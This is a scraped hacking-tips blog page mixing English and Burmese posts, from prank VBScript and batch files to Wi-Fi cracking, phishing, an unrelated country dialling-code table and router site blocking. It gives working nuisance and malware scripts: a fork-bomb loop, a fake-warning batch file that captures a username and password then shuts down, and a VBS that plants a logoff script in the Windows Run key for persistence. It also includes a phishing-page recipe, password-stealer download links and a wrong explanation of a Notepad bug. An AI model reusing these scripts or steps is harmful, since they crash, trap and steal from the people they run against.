Welcome !>>>I'm Sharing Hacking Tips & Tricks for beginner & Studiers<<<<<>>>You Can try to get Study..........

..Thank For Visit & read.>>>>>

make a cd-rom virus


WARNING - Doing this could result in crashing your computer!

IT IS NOT MY RESPONSIBILITY IF SOMETHING GOES WRONG.

DO NOT USE THIS FILE AS A VIRUS - JUST FOR EDUCATIONAL USE ONLY!

Copy and paste the following into Notepad...


DO
Set owMP = CreateOBject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
for i= 0 to colCDROMs.Count - 1
colCDROMS.Item(i).Eject
Next ' cdrom
End If
loop


And save it as CdRomVirus.vbs And enjoy.

WITH THANKS TO COMPUTER-TRICKER FOR THE
CD ROM OPENER SCRIPT - I JUST MADE IT LOOP!

The most wanted .vbs Hacks


The most wanted .vbs Hacks

VBScript (Visual Basic Scripting Edition) is an Active Scripting language developed by Microsoft that is modeled on Visual Basic.This indeed is a very interesting scripting language and I will share some of the best .vbs hacks which you can use to have loads of fun.We have shared a post on this blog which uses .vbs scripting and helps toConvert text to speech on a PC without any software.You can send these to your friends too ;)

How to use the scripts provided?
To use the scripts provided in this article you need to open a new notepad,and copy-paste the code provided within the different headings.Then goto the file menu and click “save as..” .Save it in your desktop with the name “anything.vbs” .To use the script , double click on the icon on your desktop.

Make the CD tray open and close repeatedly

12 AMAZING NOTEPAD HACKING TRICKS

        ALL NOTEPAD TRICKS.



#1 Bush Hid the Facts – Most Popular Notepad Tricks
This is one of the mysterious notepad tricks we know. According to the
trick it really seems Microsoft had put some hack into the coding of
notepad making the text hidden after saving it.
Bush Hid the Facts – Most Popular Notepad Trick Open notepad.
Type BUSH HID THE FACTS
Save that file.
Close it
Open It Again See…
Why This Happens ? : It was later known 4335 Rule. It means that if we
enter four words separated by spaces, wherein the first word has 4
letters, the next two have three letters each, and the last word has
five letters.Then Notepad Automatically hides the text into unknown
code. Similar are with “this app can break”.
OR

CMD and Notepad Codes and hacks

Notepad Codes

#1 simple a loop that opens CMD after CMD until computer crashes
@echo off
:a
Start cmd
goto :a


#2 a keylogger/shutdown computer code
@echo off
color c
start Iexplore
Title WARNING
echo WARNING VIRUS HAS ENTERED THROUGH THE DATA FRAME
echo Email Microsoft immediately
cd "C:\CMDREMARKS"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >CMDREMARKS.txt
shutdown -s -t 30 -c "Request Denied"

< Gtalk Hack with Fake Application>



OK...Are you ready?

To Download or add to your dropbox>>> https://www.dropbox.com/s/bzumb5dn1w3wcem/Gtalk%20h*****.rar


How to: Make a message box using VBScript

In this "Instructable" I'll be showing you how to make a message box in Notepad using VBScript Coding.

Please Note: This is a completely harmless project and if something DOES go wrong, I will not be help responsible.

Step 1: Step One

First thing to do is locate your Notepad.exe.
This application is on every windows computer OS and can be used for loads of interesting things.
Notepad.exe is normally located in Start Menu>All programs>Accessories

Step 2: Step Two: The code.

For this next bit, it's fairly simple, because I do all the work.

x=msgbox("Your Text Here" ,0, "Your Title Here")
Make sure that the " is included in the text and replace the Your Text Here and Your Title Here. But don't change anything elese!

Advanced users can change something else.
  • 0 =OK button only
  • 1 =OK and Cancel buttons
  • 2 =Abort, Retry, and Ignore buttons
  • 3 =Yes, No, and Cancel buttons
  • 4 =Yes and No buttons
  • 5 =Retry and Cancel buttons
  • 16 =Critical Message icon
  • 32 =Warning Query icon
  • 48 = Warning Message icon
  • 64 =Information Message icon
  • 0 = First button is default
  • 256 =Second button is default
  • 512 =Third button is default
  • 768 =Fourth button is default
  • 0 =Application modal (the current application will not work until the user responds to the message box)
  • 4096 =System modal (all applications wont work until the user responds to the message box)
Change the "0" with any of these numbers above.

Step 3: Step Three: The Saving

Now for this bit, you would think that this is easy, but it's not as simple as Save As.

When you have finished the code, go to Save As and save it as: What You Want To Call It.vbs
At the end of the name, make sure that .vbs goes at the end and safe it anywhere.




Step 4: Step Four: Lets test it!

Now that we have completed the following steps, lets test it. Locate your safe file and dubble-click it. Lets see what the outcome was.


Step 5: Outcome.

The outcome of todays lesson was:

Your learned how Notepad.exe can become a powerfull scripting program
How to make a message Box
The values of Message Box's to make them look convincing.

Thank you for reading this lesson

Trace Email Address or Fake Emails


Tracing email ids must be known by every one as one must know who is sending them emails or fake emails. So what to do? Here Hackerspositive presents Tutoiral for u all fanz to trace any incomming mail's email ID.

Tutorial:~


Hi friends, today i am going to teach you how to trace an email received in Gmail. Using this hack you can trace the source from which you have received the email. 
Hackers do a lot of stuff to hack into your email account so you should always be aware of such things like how to check the authenticity of the email that it has arrived from genuine user or its a fake email. 

here are two ways to check the authenticity of the email address:

1. Open the Email and Click on Show details.
2. For more deeper look Click on the triangle and then select show original.

Hacking With Notepad


Here is how you do a cool little hack with notepad. What it does is pops up a command prompts and overloads the computer and the computer CRASHES!!!

FOR EDUCATIONAL PURPOSES ONLY!!!!!!!

Step 1: NotePad

First you need to open Notepad.
You can go to the start menu and Click "All Programs", Then find the Folder "Accessories"
and "Notepad" should be in that folder.
Or you can open the start menu and type "Notepad" and click enter and Notepad will open.

Go To Next Step---------------------------------------->>>>>

VBS Virus ေရးနည္းမ်ား

 VBS Virus ေရးနည္းမ်ား (MOnster Technology)YTZK

Copy and paste the following into Notepad...


pass=inputbox("Password?")
if pass="fish" then msgbox("Correct Password!") else msgbox("Incorrect Password!")

The password for this is fish
Save it as Password.vbs And enjoy!

make a message box (NOTEPAD MODE)


Copy and paste the following into Notepad...


msgbox("Hello!")
msgbox("Hello, Again!")


To make the "  hold shift and 2
Inside the (" ") Type what you want it to say
Save it as Message.vbs and Enjoy!


Copy and paste the following into Notepad...

DO
msgbox("VIRUS!")
LOOP


Save it as Loop.vbs and Enjoy!

 hacktool vbs - Message box maker

Copy and paste the following into Notepad...

msgbox("HackTool VBS - Message box maker")
msg=inputbox("Enter a message...")
msgbox(" ") + msg

Save it as HackTool VBS Message Maker.vbs

The Reality Of Hacking Facebook, Gmail, Yahoo Accounts


hacker crime

This is a must read post for the beginners and newbies who have just started exploring hacking and for laymen who aren't interested in learning hacking but needs somebody's account password anyhow. I want you to aware about common misconceptions regarding Email/Social Networking Sites accounts hacking.

Otherwise those thoughts/misconceptions can seriously put you in trouble.
We usually start like googling this, "how to hack gmail" , "softwares for hacking", "how to hack facebook" etc
but unfortunately reach some malicious websites, follow stupid instructions and our own accounts get compromised.

Yes I wasn't any different and had been a foolish when I was a beginner

Okay talking in general ,
suppose you just have signed up for an account(gmail,yahoo or any other reputed website)
Your password is stored only at two places

1. In website's database
2. In your mind
(Dont say a stupid thing that it is also saved in a text file on your
PC or in your girlfriend's mind etc)

Bat Files သင္ခန္းစာ


Bat files အေၾကာင္းကုိ သိခ်င္ ေလ႕လာခ်င္တဲ႕ သူငယ္ခ်င္းမ်ားအတြက္ ကုိယ္တုိင္းေရးမဟုတ္ေပမဲ႕ ကၽြန္ေတာ္ကုိယ္တုိင္ မသိခင္က စေလ႕လာမိခဲ႕တဲ႕ ဆုိဒ္မွ မွတ္စုအေနနဲ႕ ကူးထားခဲ႕တာေလးပါ။ အဲ႕ဒီဆုိဒ္ကုိ
ညြန္းခ်င္ေပမဲ႕လည္ လက္ရွိ ဆုိဒ္လိပ္စာကလည္ မေတြ႕ေတာ႕တာေၾကာင္႔ စာေရးသားသူအေနနဲ႕ နားလည္ေပးမယ္လုိ႕ ယုံၾကည္ပါတယ္။ ဒီသင္ခန္းစာကုိ ကၽြန္ေတာ္ ကုိယ္တုိင္း ေရးသားထားတာ မဟုတ္တာကုိေတာ႕ ရုိးသားစြာ ၀န္ခံပါတယ္။ ဒါေၾကာင္႔ မသိမနားလည္ရင္ေတာ႕ ေမးျမန္းႏုိင္ပါတယ္။ အကၽြမ္းက်င္ဆုံး အဆင္႔ မဟုတ္ေပမဲ႕ တက္ႏုိင္သမွ် ရွင္းျပေပးပါမည္။ မႈရင္း အေရးအသား အတုိင္း မျပင္ မျဖည္႔စြတ္ဘဲ တင္ျပလုိက္ပါတယ္။

သင္ခန္းစာေလး ဆက္လက္ေဆြးေႏြးၾကရေအာင္
က်ေနာ္ ဒီတစ္ေခါက္ ေၿပာၿပေပးမွာကေတာ့ For Loop အေၾကာင္းေဆြးေႏြးေပးမွာၿဖစ္ပါတယ္။ အဆင့္ နည္းနည္း ၿမင့္လာၿပီၿဖစ္လို႔ ေသခ်ာေလး လိုက္လုပ္ၾကည့္ေစခ်င္တယ္။ ၁ေခါက္နဲ႔ နားမလည္ရင္ အနည္းဆုံး ၂ ေခါက္ေလာက္ဖတ္ေပးပါ။ က်ေနာ္ေရးထားတာ နားမလည္ရင္ေတာ့ က်ေနာ့္ကို ၿပန္ေမးပါ။ ေၿဖေပးပါ့မယ္။ ဒါဆုိ က်ေနာ္တုိ႔ For Loop အေၾကာင္းေလး စလုိက္ရေအာင္

IDD rate for Mobile(နုိင္ငံတကာကုတ္မ်ား)


                                                            
No. Countries
Code
Countries Name


1 1767 Dominica


2 225 Cote D lvoire


3 227 Niger


4 228 Togo


5 239 Sao Tome and Principle


6 242 Congo


7 243 Zaire ( Democratic Rep of the Congo  )

8 246 British Indian


9 248 Seychelles


10 250 Rwanda


11 261 Madagascar


12 290 Saint Helena


13 53 Cuba


14 561 Chile Special Service


15 592 Guyana


16 6013 Malaysia Gatesay


17 628 Indonesia Satellite


18 6681 Thailand gateway


19 670 Mariana


20 672 Norfolk Island (Australia)


21 674 Nauru


22 677 Solomon Islands(Br.)


23 678 Vanuatu


24 680 Palau


25 681 Wallis and Futuna


26 682 Cocos(Keeling) Islands(New Zealan)


27 683 Niue(New Zealand)


28 686 Kiribati


29 688 Tuvalu


30 690 Tokelau(New Zealand)


31 692 Marshall Islands


32 850 North Korea


33 870 Inmasat


34 873 Indian Ocean Region 761(1)

35 873 Indian Ocean Region 684(2)

36 873 Indian Ocean Region 151(3)

37 873 Indian Ocean Region 384(4)

38 881 Iridium 6,7(1)

39 881 Iridium (881 same rate)2,3,8,9,0,1(2)

40 882 Emsat( Antartica Globalnet ) (882 same rate)13,16(1)

41 93 Afghanistan


42 482 Poland Special Service


43 1 U.S  and  Canada


44 1242 Bahamas


45 1246 Barbados


46 1264 Anguilla (Br.)


47 1268 Antigua and Barbuda


48 1284 Virgin Islands (Br.)


49 1340 Virgin Islands  (US.)


50 1345 Cayman Islands


51 1441 Bermuda (Br.)


52 1649 Turks and Caicos Islands


53 1664 Monsterrat


54 1670 Mariana


55 1671 Guam


56 1681 Wallis and Futuna


57 1758 Saint Lucia


58 1784 Saint Vincent (Br.)


59 1787 Porto Rico


60 1808 Isle of Man ( Hawaii )


61 1809 Grenada


62 1868 Trinidad and Tobago


63 1869 Saint Kitts and Nevis


64 1876 Jamaica


65 1907 Alaska


66 20 Egypt


67 212 Morocco


68 213 Algeria


69 216 Tunisia


70 218 Libia


71 220 Gambia


72 221 Senegal


73 222 Mauritania


74 223 Mali


75 224 Guinea


76 226 Burkina Faso


77 229 Benin


78 230 Mauritius


79 231 Liberia


80 232 Sierra Leone


81 233 Ghana


82 234 Nigeria


83 235 Chad


84 236 Central Africa


85 237 Camerron


86 238 Cape Verde


87 240 Equatorial Guinea


88 241 Gabon


89 244 Angola


90 245 Guinea-Bissau


91 247 Ascension Island (Br.)


92 249 Sudan


93 251 Ethiopia


94 252 Somalia


95 253 Djibouti


96 254 Kenya


97 255 Tanzania


98 256 Uganda


99 257 Burundi


100 258 Mozambique


101 259 Zanzibar


102 260 Zambia


103 262 Reuninon


104 263 Zimbabwe


105 264 Namibia


106 265 Malawi


107 266 Lesotho


108 267 Botswana


109 268 Swaziland


110 269 Mayotte


111 27 South Africa


112 291 Eritrea


113 297 Aruba


114 298 Faeroe Islands


115 299 Greenland


116 30 Greece


117 31 Holland


118 32 Belgium


119 33 France


120 34 Spain and Channel  Islands


121 350 Gibraltar  (Br.)


122 351 Portugel


123 352 Luxemburg


124 353 Ireland


125 354 Iceland


126 355 Albania


127 356 Malta


128 357 Cyprus


129 358 Finland


130 359 Bulgaria


131 36 Hungary


132 370 Lithuania


133 371 Latvia


134 372 Estonia


135 373 Moldova


136 374 Armenia


137 375 White Russia


138 376 Andorra


139 377 Monaco


140 378 San Marino


141 379 Holy  See


142 38 Yogoslavia


143 380 Ukrain


144 384 Croatia


145 385 Croatia


146 386 Slovenia


147 389 Macedonia


148 39 Italy


149 39066 Vantican


150 40 Romania


151 41 Switzerland


152 4175 Liechtenstein


153 420 Czech Republic


154 421 Slovakia


155 423 Liechtenstein


156 43 Austria


157 44 Britain


158 45 Denmark


159 46 Sweden


160 47 Norway


161 48 Poland


162 49 Germany


163 500

make a scrolling text banner .Bat

Copy and Paste the following Into Notepad OR Your website <HTML> Editor.

<html>
<marquee><scrollammount=8><font color=red><font size=10>Your text Here! <Monster YTZK Technology/></marquee></font>
</html>



Comes out like this: Your text Here!


The text in blue is where you want your text to be!
Then save it as ScrollBox.htm or use it on your Website Builder.

Have a good day.vbs

Copy and paste the following into Notepad...


 name=inputbox("Whats your name?")
msgbox("Have a good day, ") + name

SAVE IT AS HAVE A GOOD DAY.VBS AND ENJOY!

Virus Creations

1 -> Virus Creation Tricks 1

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”


dowload virus

oky tooday i am going to show you how to make a fake virus
all you will need is notepad
and some basic batch file skills

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!THIS WILL NOT HARM YOUR PC!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Step 1: Open note pad

OK first thing your going to need to do is open you're notepad
after you have open it you will need to take down the code in the next step

Facebook Password Decryptor v3.0

သူကေတာ့ ..Password Recover Tools ေလးတခုပါဘဲ Hacking Tools
 ေလးတခုလုိ ့လည္းေျပာလုိ ့ရပါတယ္…Internet Explorer နဲ့ အသုံးျပဳသြား
facebook account ေတြရဲ့ password ကုိ ျပန္လည္ေဖာ္ျပေပးႏူိင္တဲ့ 
Hacking Tools ေလးပါသူမ်ားကိုဒုကၡေပးဖုိ ့အတြက္ တင္လုိက္တာေတာ့
မဟုတ္ပါဘူး…ပညာတခုအတြက္စမ္းသပ္ခ်င္တဲ့ သူေတြအတြက္ ပညာ
ရရန္သီးသန္ ့တင္ေပးလုိက္ျခင္းသာျဖစ္ပါတယ္..က်ေနာ္ ကုိယ္တုိင္လည္း
သူမ်ားကုိလုိက္ဒုကၡမေပးတတ္ပါဘူး က်ေနာ္စမ္းရင္လည္းဘဲက်ေနာ့္ 
ကိုယ္ပုိင္အေကာင့္ေတြကိုစမ္းသပ္တာဘဲမ်ားပါတယ္…
ကဲကဲ….အားလုံးဘဲစမ္းသပ္ခ်င္ရင္ေအာက္မွာဆက္ၾကည့္လုိက္ပါဦး။


          

            

How to Crack Wifi Or Wireless Password


wifi hacked


Hello Friends, today i will explain you how to crack Wifi or wireless password in just 10 to 15 minutes. i will explain How to Hack or Crack Wifi Password. Today's hack will be based on cracking the WEP encryption password. So guys Ready for crack wifi hack and lets start hack wifi. I have also included the video at bottom of the post.

STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).
Download Backtrack Linux Live CD from here: CLICK HERE.


2.  SCAN TO GET THE VICTIM

HOW TO HACK ACCOUNTS USING PHISHING

HOW TO HACK ACCOUNTS ?

Here is the tutorial for u fanz for hack account of any site using 'Phishing'.

1. First Open the website of which you want to make phisher/ fake login page   Eg : Facebook.com

2. Now do right click and save the page source.

3. Open the page in notepad, Now search for "action = " and change following address to login.php.

Wireless Router ကေန website ေတြကိုပိတ္နည္း


Wireless Router ထဲကေန မိမိတို႔ ရုံးမွာ မၾကည့္ေစခ်င္တဲ့ website ေတြကို အလြယ္တစ္ကူ ပိတ္တဲ့ နည္းပါ။ ဒီနည္းက ေတာ္ေတာ္ မ်ားမ်ား လည္းသိ့ၾကမွာပါ။ ျမန္မာမိသားစု မွာ အစ္ကို တစ္ေယာက္ တင္ေပးထား တာ လည္း ေတြ႔ဖူး ပါတယ္။ ဒါေပမဲ့ မသိ့ေသးတဲ့သူေတြအတြက္ ကၽြန္ေတာ္ အခု ့ Cisco Linksys E3000 အမ်ိဳး အစားနဲ႔ လုပ္ျပပါမယ္။ တစ္ျခား D Link wireless router ေတြမွာလဲ ေတာ္ေတာ္မ်ားမ်ားရပါတယ္။ တစ္ျခားေတာ့ မစမ္းဖူးဘူးဗ် ။ ကိုယ့္ရဲ႕ network ထဲမွာ မၾကည့္ေစခ်င္တဲ့ website ေတြကို ဘန္းတဲ့ နည္းကေတာ့ အမ်ားႀကီးရိွပါတယ။ software ေတြလည္း အမ်ားႀကီးရိွပါတယ္။ (eg: Internet Lock , Child Control) ေနာက္တစ္ခု Proxy Server ေတြ ထိုင္ၿပီးေတာ့လဲ  ဘန္းလို႔ ရပါတယ္။ (eg: ISA, Squit, Ipcop) အမ်ားႀကီးပါဗ်ာ ေနာက္ Port ေတြ လိုက္ပိတ္ထားမယ္ ။ ဘာညာေပါ့ ။ အေသးစိတ္ကိုေတာ့ ေနာက္မွေပါ့ဗ်ာ .. အခုေလာေလာဆယ္ Cisco Linksys E3000 ကို စၿပီး configure လုပ္ျပပါမယ္။

ကြ်န္ပ်ဳတာကုိ ကိုေျပာခ်င္တာေျပာခုိင္းမယ္


ကြ်န္ေတာ္လညး္ ကိုေနေစး ကေနျပီးေတာ့ ၾကိက္လုိ ့ကူးထားတာပါ။သူငယ္ခ်င္းတုိ ့လည္းၾကိက္ရင္ ကူးၾကေပ့ါ။
အရင္ဆုံး notepad ကိုဖြင့္ ျပီးရင္
Do
Dim msg, sapi
msg="I Love You. Say Monster"
Set sapi=CreateObject("sapi.spvoice")
sapi.Speak msg
loop


ကိုထည့္ျပီးေတာ့ talker.vbs ဆုိျပီးေပးျပီးေတာ့သိမ္းပါ။
ျပန္ပိတ္ရင္ေတာ့  Ctrl+shift+Esc ကိုနုိ္ပ္ပါ။ processes ကိုသြားပါ။

wbscript.exe ကို႐ွာပါ ..
ေတြ ့ရင္ေတာ့  end processes ကိုနုိပ္လုိက္ပါ၊

မွတ္ခ်က္။  ။I Love You. Say Monster ဆုိတဲ့ေနရာေလးမွာကို ၾကုိက္တာေလးရုိက္ျပီးသုံးနုိင္ပါတယ္။

.bat နဲ႔ program ေရးၾကည့္မယ္

 
မဂၤလာပါ ကၽြန္ေတာ္http://www.myanmaritresource.info/  ေတြ႕တဲ့ ဘေလာ့ေလးျပန္တင္ထားတာပါ ....
အရမ္းအသံုး၀င္တဲ့အေျခခံေလးပါ ....
ေရးထားတာ  ကနားလည္ လြယ္လို႔ျပန္လည္ျဖန္႔ေ၀လိုက္ပါတယ္ ....

bat မွာ ပါ၀င္မႈအမ်ားဆုံးနဲ႔ အေၿခခံ အက်ဆုံး command ၃ ခု

(၁) echo
(၂) @echo off/on နဲ႔
(၃) pause


1:eg

C- 

@echo off
echo Hello This is a First Program
pause


Windows Tool တစ္ခုၿဖစ္တဲ့ notepad မွာ ေရး  xxx.bat ( save)
ၿပီးရင္ေတာ့ Run လုိက္ပါ။ အမဲေရာင္ Screen ထဲမွာ ေအာက္မွာ ၿပထားတဲ့စာသားေလးေတြေပၚလာပါလိမ့္မယ္။

Hello This is a First Program
Press any key to continue...




echo off အစား echo on သံုးမယ္

Code:

@echo on
echo Hello This is a First Program
pause


notepad မွာ ေရးၿပီး xxx.bat ဆုိၿပီးသိမ္းၿပီး ၿပန္ Run လုိက္ပါ...
ေအာက္မွာ ၿပထားတဲ့ အတုိင္း ၿမင္ရပါလိမ့္မယ္။

C:\Documents and Settings\User\Desktop>echo Hello This is a First Program
Hello this is a First Program

C:\Documents and Settings\User\Desktop>pause
Press any key to continue...


အဲလိုၿမင္ရပါလိမ့္မယ္။ C:\Documents and Setting\... စတာေတြကေတာ့ တင္ထားတဲ့ Windows ၊ File ဖြဲ႔စည္းပံုေတြေပၚမူတည္ၿပီး ကြဲၿပားပါလိမ့္မယ္။

ဒုတိယေရးလိုက္တဲ့ code မွာဆုိရင္ @echo on ကိုသံုးလိုက္တဲ့ အတြက္ File ထားရာလမ္းေၾကာင္းက Program Code တစ္ခါ Run တုိင္းလာၿပေနပါတယ္။
အကယ္လို႔မ်ား ပထမစစခ်င္းမွာ ေရးခဲ့တဲ့ @echo off ကို သံုးထားမယ္ဆုိရင္ေတာ့ မည္သည့္ လမ္းေၾကာင္းကိုမွ်မေပၚေစဘဲနဲ႔ ကိုယ္လိုခ်င္တဲ့ စာသားကို ရွင္းလင္းစြာေပၚေစမွာၿဖစ္ပါတယ္။
အဲဒါကိုၾကည့္ခ်င္းအားၿဖင့္ @echo on နဲ႔ off ရဲ႕ ၿခားနားခ်က္ကို သိနုိင္ၿပီးေတာ့ @echo off ကို သံုးတာ ပိုေကာင္းတယ္ဆုိတာကို နားလည္သြားမယ္ထင္ပါတယ္။

15-Most Usefull Hacking Tools




Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.

1. NMAP

Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

DOWNLOAD IT FROM HERE      


2. WIRESHARK

Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network.

DOWNLOAD IT FROM HERE        


3. METASPLOIT COMMUNITY EDITION

Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence.

DOWNLOAD IT FROM HERE      

Hack wifi/WEP/WPA2 password using aircrack-ng


wifi hack

Now a days, We find our neighbour WiFi network but when we try to connect it say to enter password. they are put password in form of WEP or WPA/WPA2. Here is some trick to hack or Crack the wireless/WiFi password using aircrack-ng.
In my previous article I saw you to How to crack wifi or wireless password using Backtrack.

Hacking wireless wifi passwords

The most common type of wireless security are Wired Equivalent Privacy (WEP) and
Wi-Fi protected Access (WPA).
WEP was the original encryption standards for wireless so that wireless networks can be secured as 
wired network. There are several open source Utilities like aircrack-ng, weplab, WEPCrack, or 
airsnort that can be used by crackers to break in by examining packets and looking for patterns in the
encryption. WEP comes in different key sizes. The common key lengths are currently 128- and 256-bit in WEP.

70 Hacking eBook Collection

hacking ebook


Huge Hacking Ebook Collection for the hacking beginners and to the security experts to learn about the exploitation, sniffing, SQL attacks and more about the world of hacking. See list of eBooks Below.


  1. Hacking The Windows Registry
  2. Hugo Cornwall – The Hacker’s Handbook
  3. Hacking into computer systems -a beginners guide
  4. Hacking_IIS_Servers
  5. Addison-Wesley Professional.Honeypots- Tracking Hackers
  6. Wiley.The Database Hacker’s Handbook- Defending Database Servers
  7. John Wiley &_ Sons.Hacking GMail (ExtremeTech)
  8. Hacking.Guide.V3.1
  9. A-List Publishing.Hacker Linux Uncovered
  10. Hacker’S.Delight
  11. Hacker.Bibel
  12. HackerHighSchool
  13. Hacker’s Desk Reference

How to Find Hidden SSID Name


WiFi AP (or) Router ေတြမွာ SSID Name ကို Hidden လုပ္ထားရင္ Backtrack 3 (or) 4 ကိုအသံုးျပဳၿပီး ရွာလို႔ရပါတယ္။ ပထမဦးဆံုး Wireless ရွိတယ့္ Laptop (သို႔) Desktop တစ္လံုး ႏွင့္ Backtrack 3 (or) 4 Bootable CD/DVD ရိွဖို႔လိုအပ္ပါတယ္။
ပထမဦးဆံုး Backtrack Bootable CD/DVD နဲ႔ Boot တက္လိုက္ပါ။ Backtrack OS တက္သြားၿပီ ဆိုရင္ Console ကိုဖြင့္လိုက္ၿပီး ေအာက္ပါအတိုင္း ႐ိုက္ထဲ့လိုက္ပါ။
mdk3 [interface] p -b a -t [bssid]
interface ကိုသိခ်င္ရင္ Console ထဲမွာ airmon-ng လို႔႐ိုက္ထဲ့ၿပီး Enter ႏွိပ္လိုက္ပါ။

bssid ကေတာ့ AP (သို႔) Router ရဲ႕ MAC Address ကိုဆိုလိုတာပါ။

Here is the command to get the name of hidden SSID:

Tools: mdk3
Platform: Backtrack

Command : mdk3 [interface] p -b a -t [bssid] 

eg: mdk3 eth1 p -b a -t 11:22:33:44:55

*Only recommend for short SSID like 1 to 7 chars.

Steal All Passwords Of Computer Using USB

How to steal passwords from a computer with USB in just seconds???

Here is the tutorial you want fanz, you can steal any pass means all passwords related to that computer. it can also steal once saved browser passes. 

Tutorial: 

How to make stealer?


Download This Ready made Files or make your own way as shown below. Pass Stealer
Blogger Tips and TricksLatest Tips For BloggersBlogger Tricks
Related Posts Plugin for WordPress, Blogger...
 
©2012 M0N$T3R# Created by MÖN$TéR | Shad0w MÖN$TéR